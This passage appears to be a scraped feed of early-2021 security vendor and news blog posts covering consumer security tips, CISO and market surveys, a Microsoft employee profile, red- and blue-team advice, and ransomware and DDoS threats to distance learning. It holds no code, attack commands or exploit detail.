Online alternatives will continue to replace activities in people’s lives that were once in-person. According to our survey, the top digital activities that will remain part of our routines even as social distancing and stay-at-home restrictions lift include online banking, social engagements, and personal shopping. But as we continue to rely on technology to complete these tasks, how are we adapting our security habits to greater time spent online?

New Year, New Digital You

New Digital Worlds Also Means an Increase in New Digital Threats 

The more time we spend online interacting with various apps and services, the greater our exposure is to potential c

ybersecurity risks and threats. So, as we continue to adapt to and embrace our new digital world, hackers are simultaneously taking notes. Survey results show that 67% of respondents are most concerned about their financial data being stolen or compromised, while 65% are concerned that their personal information could get hacked.

A heightened sense of security is of the utmost importance so we can continue to live our digital lives free from worry. But 45% of survey respondents don’t feel very confident about their ability to prevent a cyberattack and believe that they don’t have what they need to ward  one off.

Even with these concerns, there still appears to be a discrepancy between our perceptions around online security ver

sus our actions. While 66% of respondents stated that they purchased at least one connected device in 2020, only 42% bought security software, and only a quarter admitted that they check if their security software is up to date. But to preserve our digital wellness as we adopt new technology into our lives, we must upgrade our security habits in tandem. After all, it’s better to prevent a problem than be in a position of having to fix it.

Stay One Step Ahead of Hackers in 2021 and Beyond

To help prevent a hacker from striking, it helps to think about why they would want your data in the first place. However, 61% of Canadian respondents admitted that they never considered how much their online data is worth. Hackers are always looking for ways to exploit others for money. By scavenging and stealing our personally identifiable information over the internet, hackers can piece together our identities – a valuable asset and can be resold for a lot of cash.

To stay one step ahead of hackers and protect your digital wellness into the new year and beyond, continue to work on your own online habits and follow these security tips:

Use multi-factor authentication

Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification like texting or emailing a secure code to verify your identity. Most popular online sites like Gmail, Dropbox, LinkedIn, Facebook, etc. offer multi-factor authentication, and it takes just a few minutes to set it up. This reduces the risk of successful impersonation by criminals who may have uncovered your information by keyboard snooping.

Connect with caution.

Hackers tend to lurk in the shadows on public Wi-Fi networks to catch unsuspecting users looking for free internet access. If you have to conduct transactions on a public Wi-Fi network, use a virtual private network (VPN) like McAfee® Safe Connect to help keep you safe while you’re online.

Browse with added security

Use a comprehensive security solution, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.

Enable security settings

When using third-party tools like video conferencing platforms, adjust your security settings by password protecting your meetings and blocking other meeting attendees from sharing their screens. You can also adjust your device’s app permissions to only access your location when actively in use, or enable safe browsing options to protect you from malicious websites.

Stay Updated  

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post New Year, New Digital You: Canadian Survey Findings from McAfee appeared first on McAfee Blogs.

Security researchers targeted by North Korean hackers

Over the past few months, hackers have been trying to surreptitiously backdoor the computer systems of a number of security researchers working on vulnerability research and development at different companies and organizations, the Google Threat Analysis Group (TAG) has revealed on Monday. The hackers’ tactics The hackers, who Google TAG believes are backed by the North Korean government, first created a blog, populated it with posts write-ups about vulnerabilities that have been publicly disclosed, then … More

The post Security researchers targeted by North Korean hackers appeared first on Help Net Security.

The impact of COVID-19 on how CISOs make buying decisions

It’s no secret that the past year has resulted in organizations fast-tracking their digital transformation projects, making drastic changes to their operations while also attempting to prepare for a very uncertain future. To get a sense of the real impact of the pandemic on cyber security, we conducted a wide-ranging survey with UK IT decision makers on their expectations and priorities for the next 12 months. We found that COVID-19 has not only led to … More

The post The impact of COVID-19 on how CISOs make buying decisions appeared first on Help Net Security.

Small security teams overwhelmed by onslaught of cyber attacks

Companies with small security teams, generally SMEs, are facing a number of unique challenges, placing these organizations at greater risk than their larger enterprise counterparts, according to Cynet. These enhanced risks are moving 100% of these companies to outsource at least some aspects of security threat mitigation in order to safeguard IT assets. In this survey of 200 CISOs at SMEs with five or fewer security staff members and cybersecurity budgets of $1 million or … More

The post Small security teams overwhelmed by onslaught of cyber attacks appeared first on Help Net Security.

Cybersecurity investments will increase up to 10% in 2021

A Canalys forecast predicts cybersecurity investments will increase 10% worldwide in the best-case scenario in 2021. Information security will remain a high priority this year, as the range of threats broadens and new vulnerabilities emerge, while the frequency of attacks is unlikely to subside. Cybersecurity market global forecast assumes current investment trends will persist. The first half of the year will be affected by ongoing lockdown restrictions and furloughs in response to the pandemic. COVID-19 … More

The post Cybersecurity investments will increase up to 10% in 2021 appeared first on Help Net Security.

How secure configurations meet consensus

Have you ever wondered how technology hardening guidelines are developed? Some are determined by a particular vendor or driven by a bottom-line perspective. But that’s not the case with CIS Benchmarks. They’re developed by the Center for Internet Security (CIS) and the only consensus-developed security configuration recommendations both created and trusted by a global community of IT security professionals from academia, government, and industry. There are currently more than 100 configuration guidelines for 25+ vendor … More

The post How secure configurations meet consensus appeared first on Help Net Security.

How companies are securing devices with Zero Trust practices

Organizations are seeing a substantial increase in the diversity of devices accessing their networks. With employees using personal devices and accessing corporate resources from new locations in record numbers, IT leaders are seeing an increase in their attack surface area. They’re turning to Zero Trust security models to ensure they have the visibility they need, and their data is protected as its accessed from outside the corporate network using a wider variety of devices.

We surveyed IT leaders around the world to determine how they’re using Zero Trust practices to protect their devices and enable access to the corporate network from unsecured devices.

A clickable link to the full PDF infographic to the Zero Trust whitepaper

  1. More personal devices are accessing corporate resources than ever. In response to the substantial shift to remote work, IT leaders report seeing more of their employees using personal devices to access their networks. As a result, they’re prioritizing device management solutions to improve security and control on personal devices.
  2. Devices accessing the network are monitored but often left out of access decisions. While most IT leaders report that they’re monitoring device health and compliance, the majority aren’t currently using that status in their access decision making. Preventing unauthorized and risky devices is critical to protecting corporate data in a modern environment.
  3. Personal devices are widely agreed to increase risk exposure. Over 92 percent of IT leaders agree that a proliferation of personal devices is increasing their attack surface area. However, much less say they’re prepared for managing access from unsecured devices.

Check out the infographic for more details.

If you’re looking at how to help prevent devices from being the weakest link in your security strategy, check out our Zero Trust deployment guidance for endpoints.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How companies are securing devices with Zero Trust practices appeared first on Microsoft Security.

Identity governance: The power of “Why not?”

Innovation requires the courage to take risks and the leadership skills to show others that risks are worth taking. That’s why I love working with people like Joe Dadzie, a partner group program manager in identity governance. Joe has a long history of championing disruptive technology breakthroughs and delivering for our customers. He’s never shied away from pushing boundaries or breaking free from “the way we’ve always done things” to build better solutions. By his example, he inspires fearlessness in his team and in those he mentors. Joe’s achievements remind all of us in identity that when we focus on the needs of our customers, everyone wins. I hope you enjoy his remarkable story. 

The power of “Why not?” 

A profile headshot of Joe Dadzie, wearing a grey shirt against a cream-colored wall.

The first time Joe Dadzie traveled outside his native Ghana, in 1991, he flew to Boston on a one-way ticket. “I had no freaking clue what the U.S. was like,” he laughs. Inspired by a U.S. State Department advisor whose husband was the first Ghanaian ever to attend Dartmouth, Joe was heading to the New Hampshire-based college to study engineering. “I didn’t know anything about computers,” he admits. “And I had no idea New Hampshire would be so cold!” 

Thirty years later, Joe works in a warmer climate, designing governance technologies in the identity division at Microsoft. “Organizations have security and compliance requirements,” he explains. “They need to reduce the risk of data loss or leakage, and if they’re in regulated industries, they have to pass audits. At the same time, they need to empower their employees to work effectively, with the fewest possible constraints. My team designs tools to help them.” 

Every project Joe’s ever worked on started the same way—with some customer challenge he became fixated on solving. “I’m never going to be a computer science dude,” the twenty-five-year software industry veteran confesses. He finds “super hard problems” infinitely more fascinating than technology. “Utility is more interesting to me because when I look at the groundbreaking technologies I’ve worked on over the years, they rose up, and now some of them are gone.”  

The successive extinctions of technology paradigms in favor of the “hottest new thing” form the mile markers of Joe’s career: from floppies to CDs, from the FAT file system to NTFS, from shrink-wrapped software to cloud-based services. He not only takes change in stride, he pushes it, leading more than one manager to question his sanity. 

“When we proposed Windows Update, the whole notion that you could install things over the Internet didn’t exist,” he recalls. People worried about the optics of taking control of people’s machines for automatic updates. “Are you guys crazy? Nobody wants that!” he remembers his colleagues shrieking. 

“When we did that first Windows service pack, 250 megabytes over the internet, that was revolutionary,” Joe asserts. “Were we going to bring the internet down? We didn’t. And now, Windows Update is baked in for securing users around the world. It just happens.” Software updates that once started with tearing the plastic off the latest release and inserting a disk happen today whenever someone launches a program. Twenty years after Windows Update first started patching PCs, the whole world goes “crazy” every day. 

The “try it” spirit 

Joe is not, in fact, crazy. He’s simply incurably optimistic, responding to each no-one-has-done-this-before challenge with an unassuming “Why not?”  

He’s greeted challenges this way since an early age. “Where I grew up, nobody applied to the top high schools,” Joe says. “I thought it was weird. Why does the teacher say that nobody from our elementary school should apply to this high school? Why not? I think I’m smart enough.” Joe did apply, and he ended up at a top high school in Ghana, where he became a top student—one of the few who achieved a perfect score on the national Ordinary Level General Certificate of Education exam. 

He credits his parents with instilling in him the “you should be able to try stuff” spirit that got him where he is today. “Both of them actually left Ghana to study,” Joe says. “They took this leap of going to England to try something new, did okay, and came back.” Following their lead, Joe applied to colleges in the United States with support from local mentors. The U.S. State Department advisor reassured him that scholarships would cover the tuition he couldn’t afford. An eye surgeon and Stanford University professor who worked with his mom, a nurse, covered his SAT test and college application fees.  

“I got into Dartmouth and told myself to take the leap of faith,” Joe recalls. “Try this. I may not know where it goes, but what’s the worst that could happen? I would go back to Ghana.” 

Maximizing opportunity 

Before matriculating at Dartmouth, Joe had never used computers. He was stunned to learn that the engineering department required all students to buy one—a Mac. “I was like, what the heck is this thing?” he jokes. While other students arrived already knowing how to code, Joe started with basic computer science classes, his sense of obligation fueling his work ethic. 

“I was conscious of not wasting the opportunity that I had,” Joe says. He literally did the math, calculating how much a skipped class would cost in scholarship dollars—a lot of money when converted to Ghanaian currency. “Look,” he reasons, “if you’ve got into someplace through the help of others, maximize it and focus on performance.” 

At first, Joe had no interest in the software industry. “I did a project with a physics professor that ended up being a computer project,” he says. That project, listed on Joe’s resume, caught the eye of a recruiter who encouraged him to attend an info session about Microsoft’s summer internship program. Intrigued by the prospect of visiting the American West Coast, he applied. “Hey, I may not get it because I’m not a computer science guy, but why not try it out?” he told himself. He flew to Redmond, did the interview, and got an offer. 

His summer project—figuring out how to make the software setup process easier for customers—established the tone for the rest of his career. “That internship was fun,” he reminisces. “I got to learn new things, didn’t have to dress up for work, and got to play soccer every lunchtime.” By the end of the internship, Joe was sold on a career in software. He turned down higher-paying offers from consulting and Wall Street firms to return to Microsoft, casual attire, and lunchtime scrimmages.  

Advocating for customers 

In 2000, after working on Windows Update for several months, Joe proposed a corporate version in a paper he submitted for Bill Gates’ ThinkWeek“Enterprise customers were telling us that they wanted a way to manage updates themselves. I got an email about ThinkWeek that said anybody can submit an idea. I said, ‘Okay, let’s submit something.’ I didn’t know if anyone would read it, but I wanted to respond to customer feedback, and the ThinkWeek paper seemed like an opportunity to do that.”  

Reviewers, including Gates, liked the idea of what became the Software Update Service (SUS). Within six months, Joe and his small team of “one other program manager and two or three developers” shipped a beta. Customers responded to SUS with a request that Microsoft extend it to help them manage updates to devices for remote employees and road warriors. Thus, Intune was born. Joe proudly recalls the “awesome customer feedback” they received when Intune shipped. “They wanted to use it!” he enthuses. 

A decade later, Joe returned to Ghana for his sabbatical. “It was 2011. When I talked to people, I realized that I was way too Microsoft-insular.” He noticed, for example, that much of the technology others now used had no Microsoft bits in them. When he returned to work, he struggled to reconcile what customers were telling him they wanted with the strategy his leaders wanted to follow. His father’s death in February 2012 forced him to reassess his priorities, and after seventeen years at Microsoft, he left. 

With no clear plans on what to do next, Joe spent the next two years on a soccer field, training with his pre-teen son, and “learning the non-Microsoft stack” by developing an app for managing soccer teams. For about a year, he also worked on the loyalty platform for a major retailer. 

Then serendipity struck again. 

A new mission 

A Facebook post from a Microsoft friend that said, “When your CEO asks you to take on a new job, you can’t say no,” piqued Joe’s curiosity. “I had been hearing people say that Satya was changing the Microsoft culture,” he says. “So, I reached out.” After talking with several Microsoft managers about potential roles, he decided to take another leap of faith: rejoining the company. 

Although he had an offer from one of his previous teams, Joe liked the identity division’s customer-centric culture and the allure of the unfamiliar. He missed the thrill of seeing a new product area come to life. “All of my previous successes had come from listening to customers, and I liked the idea of taking an unknown thing, then pulling in disparate data to figure it out, plan, and just go solve it.”  

When Joe joined the identity effort, he inherited a single program manager and an on-premises governance tool, Microsoft Identity Manager (MIM). The first thing he did was to resurrect the process that had served him so well in the past: listen to customers, spot the trend, and propose big bold solutions to address it.  

“I knew nothing about identity, so I was like, okay, go on a listening tour,” Joe muses. “What issues did people have with this tool that I own? All the customers were saying, ‘It requires a bunch of consultants. The UI is complicated,’ et cetera.” Microsoft partners told Joe they didn’t use any of the governance capabilities in MIM because they were too complex and not fully integrated. “But even though people complained about MIM, almost every large company had deployed it in some critical area,” Joe reveals. “We concluded that making governance tools easier to use and more integrated would probably solve their problems.” 

An integrated approach  

When Joe embarked on his new mission, the industry had been treating identity governance as separate from access management. Joe doesn’t feel an obligation to preserve their dictionary definitions by insisting the two functions stay separate. “If you focus on the customer problem that governance is a means to help reduce access risk in an organization,” he contends, “then all the things you need in access management and governance have to form a continuum. It cannot be two separate things. 

“The customer is trying to solve a problem that these tools will come together to solve,” he insists. “It’s an end-to-end problem that’s not just about compliance. We also have to enable productivity.” This means simplifying the process of granting people access to resources when they need them and removing access when they don’t while ensuring that IT managers have a complete history they can easily report to regulators.  

“In the governance space, we are trying to help organizations answer four basic questions,” Joe says. “Who has or should have access to resources? What can they do with their access? Should they continue to have that access? And how do you prove that? 

Customers, whether end-users or IT managers, shouldn’t have to “worry,” Joe emphasizes. The system should provide answers automatically. “If there’s a regulatory need to insist that people get approval before accessing a particular resource, then we’ll provide those tools,” he says. “We make it easy for employees to go to the resource, request access, and get that access quickly. Then we automatically remove access when the project ends.” 

Embracing serendipity 

Joe’s Microsoft career has been a series of challenges, choices, and serendipitous opportunities to work on pioneering projects: CD boot, unattended install, common installers, patch updates, Microsoft Intune, and now identity governance. He’s tackled them all with the same aplomb that got him into the high school his teachers had said wasn’t meant for students like him.  

“If you focus on the customer problem, most of the time you get it right,” he offers. “And if things get screwed up, you can fix it and move forward. So why panic and get all riled up?” 

Reflecting back on his career path, he says, “Sometimes it’s about not being afraid of serendipitous opportunities to go learn something new and experience the good things that come out of it.”  

He shares his own story to encourage others to take on new challenges. “My experiences may help other people do more than they think they’re capable of,” he says. Recalling his first flight out of Ghana, when he was a teenager heading to college in a strange land, he asks his mentees, “What’s the worst that could happen? You may fail and have to start over. Or maybe you will change the world. So…Why not?” 

To learn more about Microsoft Identity solutions, visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @AzureAD and @MSFTSecurity for the latest news and updates on cybersecurity. 

The post Identity governance: The power of “Why not?” appeared first on Microsoft Security.

How do I select a data encryption solution for my business?

It is a mathematical certainty that data is more protected by communication products that provide end-to-end encryption (E2EE). Yet, many CISOs are required to prioritize regulatory requirements before data protection when considering the corporate use of E2EE communications. Most Fortune 1000 compliance and security teams have the ability to access employee accounts on their enterprise communications platform to monitor activity and investigate bad actors. This access is often required in highly regulated industries and E2EE … More

The post How do I select a data encryption solution for my business? appeared first on Help Net Security.

How much is a vulnerability worth?

As part of its crowdsourced security program, Zoom has recently increased the maximum payout for vulnerabilities to $50,000. Such figures make great headlines and attract new talent in search of the big bucks, but here is a question that begs to be answered: how much is a vulnerability worth? I have previously found several bugs in Zoom’s products, although these now date back several years, to when the company’s crowdsourced security program was a fledgling … More

The post How much is a vulnerability worth? appeared first on Help Net Security.

SCM market to reach $2.2B in total web and email security revenues by 2024

The Secure Content Management (SCM) market is expected to achieve an 11.4% compound annual growth rate to reach $2.2 billion in total web and email security revenues by 2024, according to Frost & Sullivan. Cloud-based deployments are projected to lead growth as more enterprises move their emails to the cloud and rely on the internet, including remote working, especially during COVID-19. Malicious email and web links remain the most popular attack vectors Malicious email and … More

The post SCM market to reach $2.2B in total web and email security revenues by 2024 appeared first on Help Net Security.

Bolstering healthcare IT against growing security threats

As the COVID-19 pandemic unfolds, healthcare organizations are scrambling to ensure the safety and support of patients and staff, while also integrating and learning new technologies to support telehealth practices. The constantly evolving healthcare environment has placed immense financial strain on hospitals and increased pressure on healthcare staff, which has been made worse by the influx of possible security threats. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has recently released an alert highlighting imminent … More

The post Bolstering healthcare IT against growing security threats appeared first on Help Net Security.

Retail and hospitality sector fixing software flaws at a faster rate than others

The retail and hospitality sector is fixing software flaws at a faster rate than five other sectors, a Veracode analysis of more than 130,000 applications reveals. The ability to find and fix potential security defects quickly is a necessity, particularly in an industry that requires rapid response to changing customer demands. Retail and hospitality also track a high volume of personal information about consumers through loyalty cards and membership accounts, tying into marketing data from … More

The post Retail and hospitality sector fixing software flaws at a faster rate than others appeared first on Help Net Security.

Organizations struggle to maintain application security across platforms

Global organizations are struggling to maintain consistent application security across multiple platforms, and they are also losing visibility with the emergence of new architectures and the adoption of APIs, Radware reveals. Working to maintain application security across platforms A major factor in these challenges was the need to adjust rapidly to a new remote working and customer engagement model that resulted from the pandemic, leaving decision makers little or no time to conduct adequate security … More

The post Organizations struggle to maintain application security across platforms appeared first on Help Net Security.

Financial institutions must prepare for increased risk of financial crime

LexisNexis Risk Solutions published survey results of U.S. and Canadian compliance professionals on the range of challenges that financial institutions have experienced during the COVID-19 pandemic. The survey outlines the issues that many financial institutions encounter today and finds that the pandemic continues to test the resilience and agility of businesses across every market. The top three issues that compliance departments within financial institutions have experienced during the pandemic are: 42% face difficulty accessing information … More

The post Financial institutions must prepare for increased risk of financial crime appeared first on Help Net Security.

Blue Cedar partners with Microsoft to combat BYOD issues

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA.  

Bring Your Own Device (BYOD) has been a divisive topic within corporations for years. Employees wanted the convenience of working on their own smart devices, and business decision-makers recognized the cost and productivity benefits. IT teams knew unmanaged devices would result in more work and security holes. 

As you know, the business side won out. The line-of-business (LOB) mobile app market exploded, and BYOD became the rule rather than the exception. Today, corporate IT teams manage hundreds of mobile LOBs ranging from apps developed in house to Microsoft 365, with more on the horizon. There is one thing that everyone can agree on, however: Employers should not manage their employees’ personal devices. 

Establishing data boundaries

IT teams constantly struggle to walk the delicate line of managing corporate data without impinging on personal data. The Microsoft Intune and Microsoft Office 365 teams set out to solve the problem together. The teams worked together to develop app protection policies (APPs) for what would become Microsoft Endpoint Manager (MEM). The APP places restrictions on how Office 365 data can be used on a completely managed or completely unmanaged device. Specifically:  

  • Data can only be shared between managed Office 365 apps. 
  • Users cannot forward it or save it to a non-Office 365 resource. 

Blue Cedar’s solution for Microsoft

IT and security teams have been searching for a solution to accommodate BYOD that won’t compromise network security. The Blue Cedar Platform is a no-code Integration service that enables new capabilities to be added to Mobile apps post-build without requiring a developer. With a couple of clicks, you can add Intune MAM, Azure Active Directory Authentication, and other SDKs into your compiled mobile app. The platform works with native apps or apps written using a mobile framework and integrates into your existing app delivery workflow. Built-in integrations with GitHub and the Intune cloud allow you to build seamless workflows that add new app capabilities and skip manual operations.  

Feature highlights: 

  • Add Microsoft Endpoint Manager App Protection Policy capabilities.  
  • Add new app authentication flows include the use of the Microsoft authenticator app. 
  • Keep corporate data separate from personal data. 
  • Allow users to BYOD without creating security vulnerabilities. 
  • Maintains end-user privacy. 

Secure VPN connections to on-premises resources

There is one last thing I’d like to tell you about today—and it’s a potential gamechanger for many organizations. Many companies still maintain critical data on-prem, meaning employees can’t easily access it from their mobile devices. Utilizing our patented No-code integration technology, VPN capabilities can be added to mobile apps allowing them to attach to the corporate network. 

Our in-app VPN functionality enables users to automatically connect to on-premises and in-cloud networks without requiring device management or complex VPN configuration. Our VPN connectivity is transparent and secured via a multi-factor authentication backed by Azure AD 

Infographic showing Secure VPN connections to on-premises resources using Blue Cedar

Secure VPN feature highlights: 

  • Extends network availability to on-prem networks. 
  • Permits login with Azure AD credentials. 
  • Separates corporate data from personal data.
  • Improves productivity. 

The Blue Cedar platform is also the only way to securely connect Intune-enabled apps to both cloud and on-premises databases for a single sign-on (SSO) experience without bringing the devices under management. 

Better BYOD for your organization

BYOD is here to stay; the Blue Cedar collaboration with Microsoft will save you time, resources, and budget while providing secure mobile access to your on-prem or cloud-based resources.  

To learn more about Blue Cedar Platform, visit the Blue Cedar listing in the Azure Marketplace or visit our web page about Blue Cedar’s no-code integration service. 

To learn more about the Microsoft Intelligent Security Association (MISA), visit the MISA website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.  

For more information about Microsoft Security Solutions, visit the Microsoft Security website. Bookmark the Security blog to keep up with our expert coverage of security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.  

The post Blue Cedar partners with Microsoft to combat BYOD issues appeared first on Microsoft Security.

The dynamic duo: How to build a red and blue team to strengthen your cybersecurity, Part 2

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the first post of our new Voice of the Community blog series, Microsoft Product Marketing Manager Natalia Godyla talks with Jake Williams, Founder of Rendition InfoSec. In part two of this blog, Jake shares his best practices on how to structure and evolve red and blue teaming within your organization.

What are best practices for organizations maturing their blue team?

First and foremost, go in and look at the event logs and turn on all of the logging that you think will be useful. I work with blue teams today up and down the Fortune 500, and I ask, “Where is this in your event logs?” And they say, “I think maybe my endpoint detection and response (EDR) platform may catch that.” Windows catches that. Windows detects the thing we’re talking about if you have it configured. It’s more than 100 event logs, and a lot of them are empty and the ones that are populated are not logging the best things you can log. A lot of the reason for that is logs get big.

The second cybersecurity best practice is to use Group Policy Object (GPO) and increase the size of your event logs dramatically. I think the security event log pegs at 20 megabytes. The way that I explain this to folks is I’ve never been an instant responder and worked the case where I walk in and think, “What am I going to do with all these logs?”

Third, actually walk through the audit policy. I want you to go look at it. If you’re a systems architect or a systems engineer, you have to know what’s even available. Not knowing what’s available from an audit standpoint is almost like going to a restaurant, never reading the menu and saying, “I heard you had a burger so I’m going to have that.” And you have no idea what else could be there that could be way better. Go read the menu. Find out what audit logs are available and increase the size of them dramatically.

We’ve had folks do one but not the other. There was this heartbreaking case a couple of years back where they called, and I ended up being on the flyaway team. When they called, we asked, “What auditing do you have available?” We told them to turn it on and increase the size of the event log, and they did one of those two. And when I got onsite, and I got into that server, there were 18 seconds of security event logs. 18 seconds. It was awesome that they turned some stuff on, but at the same time, I needed the log in general, not 18 seconds of activity. It was just heartbreaking.

What is your guidance to red teamers? What best practices should they consider?

Stop trying to be sexy. Every time there’s a major security conference like a Black Hat or a ShmooCon, I get some red teamers who come back and say, “I just saw this super cool, super awesome technique.” I ask, “Are attackers using that?” and they say, “I’m sure they will be.” When we have credible intelligence that they are, then we’re going to invest that time. Make sure you’re actually providing value back to the organization and understand what that means.

In late 2019, I was at a major insurance company and they have a red team that is about a third of the size of their blue team, which is just wrong. I asked, “Can I see an example of a report?” And the red team leader says, “No.” I said, “You do know I have an NDA with you. We’re physically here at your headquarters.” He said that they only share these reports with management and that executives understand the risks. He said that if they tell the blue team how they’re doing everything, they’ll catch the red team immediately.

The biggest outcome of this exercise became how do we stop doing red team for red team’s sake, such as to be a bunch of cool hackers and go break stuff. How do we turn this around where the red team is providing value to blue team? Security is a service provider to the organization, and red team ultimately should be driven by blue team (their customer). The red team’s goal isn’t to go sneak around and remain undetected for the sake of their egos. The goal is to identify vulnerabilities, missing patches or misconfigurations, or find gaps in coverage for monitoring. The customer for that is blue team. I look at the blue team as tasking the red team and saying, “Here’s what we need from you.” Red team’s hacking, sexy, cool stuff is secondary.

What kind of training would you recommend for red and blue teams?

If I’m a blue teamer, I’m going to be staying on the cutting edge of what’s the latest thing happening with system logs. I’m less about tools than I am about techniques. What do I have available from a detection standpoint? I’m not interested necessarily in my blue teamers going out and trying to figure out how to go through exploits, run exploits. That’s a red team kind of thing.

For a red team, send them to conferences. People don’t like to hear this, but the conferences are going to pay off better than any red team courses for anybody who has got more than a year of red team experience. The reason is the networking. You network, and you start getting put in these private Slack groups or on email lists. Everybody knows everybody. You’re going to hear about those newer techniques. I’m less about formalized training than I am about getting them into networking opportunities.

What do you think red and blue teams will continue to think about even after the pandemic? What changes are going to make long-lasting impacts on the security industry?

This applies to both red and blue teams, and it’s understanding the attack surface. Something that we’ve seen more than any previous year has to be software-as-a-service (SaaS). We shifted to work from home, depending on which part of the country, either over a 24 or a 48-hour period all the way up to maybe a two-week period. By any measure, it’s insanely fast for a lot of folks to do, and so they made a lot of changes to get stuff done without really looking at the long-term security implications.

I’m already discussing with clients how to go back and memorialize what they did as we ran home. In late March, most CISOs I talked to didn’t believe we’d still be at home at the end of the year. They thought this was a one-month or two-month situation so risks we were ready to accept for a month look a whole lot different than risks we’re going to live with in perpetuity.

For the folks rolling into holiday standdown time, now is the time to make some of those changes. On the red team side, another big one is: Know your scope, know your scope, know your scope. Just because I have data in Salesforce doesn’t mean you can go hack Salesforce. Your red team needs to know what they legally can do and what they ethically should do and make sure everyone is aligned there. From a blue team side, you figure out how you want them to evaluate the security of your Salesforce tenant. I think that’s really it, knowing what architecture changes we made as we moved into that fully remote environment, and how many of those need to be revisited. And the answer is a lot of them. I think it’s no secret that a lack of change control drives a lot of breaches.

Any last words of wisdom to help red and blue teams strengthen cybersecurity?

Both red and blue should absolutely be using threat intelligence. That doesn’t mean every org needs a dedicated cyber threat intelligence (CTI) analyst. It doesn’t mean go buy another threat intelligence feed. What I’m looking at is what we need to prioritize not based on what could happen but on what we know is happening. Those are two very different things. When I look at the range of possible bad things that could happen to us, I think: What are we actually seeing in the wild, both in our organizations and in other organizations?

When you learn about a threat that’s targeting a different industry, like healthcare, should you be paying attention to it? The answer is obviously yes, you should be. Just because it’s a big push in one industry doesn’t mean it’s not coming to you. All things equal, I’m going to prioritize more in my vertical, but I have to have an ear to the grindstone for what’s happening in other verticals as well.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity or on LinkedIn for the latest news and updates on cybersecurity.

The post The dynamic duo: How to build a red and blue team to strengthen your cybersecurity, Part 2 appeared first on Microsoft Security.

Ransomware provides the perfect cover

Look at any list of security challenges that CISOs are most concerned about and you’ll consistently find ransomware on them. It’s no wonder: ransomware attacks cripple organizations due to the costs of downtime, recovery, regulatory penalties, and lost revenue. Unfortunately, cybercriminals have added an extra sting to these attacks: they are using ransomware as a smokescreen to divert security teams from other clandestine activities behind the scenes. Attackers are using the noise of ransomware to … More

The post Ransomware provides the perfect cover appeared first on Help Net Security.

Financial institutions can strengthen cybersecurity with SWIFT’s CSCF v2021

The Society for Worldwide Interbank Financial Telecommunications (SWIFT) has introduced an updated set of baseline customer security controls that all of its users must implement on their SWIFT-related infrastructure by mid-year 2021. SWIFT is the world’s largest provider of secure financial messaging services to banks and other financial institutions. SWIFT has more than 11,000 users in over 200 countries, which makes it an attractive target to cybercriminals looking for banking information to perpetuate their fraudulent … More

The post Financial institutions can strengthen cybersecurity with SWIFT’s CSCF v2021 appeared first on Help Net Security.

Most CISOs believe that human error is the biggest risk for their organization

53% of CISOs and CSOs in the UK&I reported that their organization suffered at least one significant cyberattack in 2020, with 14% experiencing multiple attacks, a Proofpoint survey reveals. This trend is not set to slow down, with 64% expressing concern that their organization is at risk of an attack in 2021. Those in larger organizations feel at greater threat, with this figure jumping to 89% amongst CSOs and CISOs from organizations over 2,500 employees … More

The post Most CISOs believe that human error is the biggest risk for their organization appeared first on Help Net Security.

IT leaders concerned about their ability to keep up with digital transformation

IT leaders have growing concerns about their ability to keep up with digital transformation, a Dynatrace survey of 700 CIOs reveals. Traditional IT operating models with siloed teams and multiple monitoring and management solutions are proving ineffective at keeping up with cloud-native architectures. As a result, teams waste time manually combining data from disparate solutions in a reactive effort to solve challenges instead of focusing on driving innovation. Key findings 89% of CIOs say digital … More

The post IT leaders concerned about their ability to keep up with digital transformation appeared first on Help Net Security.

Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021

Ransomware Alert

Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021

The holidays have come and gone, and students returned to the virtual classroom. But according to the FBI, cyberattacks are likely to disrupt online learning in the new year. As of December 2020, the FBI, Cybersecurity and Infrastructure Security Agency (CISA), and MS-ISAC continue to receive reports from K-12 educational institutions about the disruptions caused by cyberthreats, primarily ransomware and Distributed Denial of Service (DDoS). To protect their education and digital lives, distance learners will need to stay vigilant when it comes to ransomware and DDoS attacks. Let’s dive into the impact these threats have on the K-12 education system now that more people are plugged in as a result of distance learning.

Hackers Hold Education for Ransom

Of all the attacks plaguing K-12 schools this year, ransomware has been a particularly aggressive threat. Ransomware attacks typically block access to a computer system or files until the victim pays a certain amount of money or “ransom.” The FBI and the CISA issued a warning that showed a nearly 30% increase in ransomware attacks against schools. In August and September, 57% of ransomware incidents involved K-12 schools, compared to 28% of all reported ransomware incidents from January through July. And it’s unlikely that hackers will let up anytime soon. Baltimore County’s school system was recently shut down by a ransomware attack that hit all of its network systems and closed schools for several days for about 111,000 students. It wasn’t until last week that school officials could finally regain access to files they feared were lost forever, including student transcripts, first-quarter grades, and vital records for children in special education programs.

According to to ZDNet, the five most active ransomware groups targeting K-12 schools are Ryuk, Maze, Nefilim, AKO, and Sodinokibi/REvil. Furthermore, all five of these ransomware families are known to run “leak sites,” where they dump data from victims who don’t pay the ransom. This creates a particularly dangerous problem of having student data published online. To prevent distance learning disruption, students and educators need to understand the effects of ransomware on school systems and take steps to prevent the damage caused by this threat.

DDoS Attacks Disrupt the Distance Learning

An increase in ransomware attacks isn’t the only problem that K-12 schools are facing. The CISA and the FBI warned those participating in distance learning to protect themselves against other forms of cyberattacks such as Distributed Denial of Service (DDoS). DDoS is a method where hackers flood a network with so much traffic that it cannot operate or communicate as it normally would.

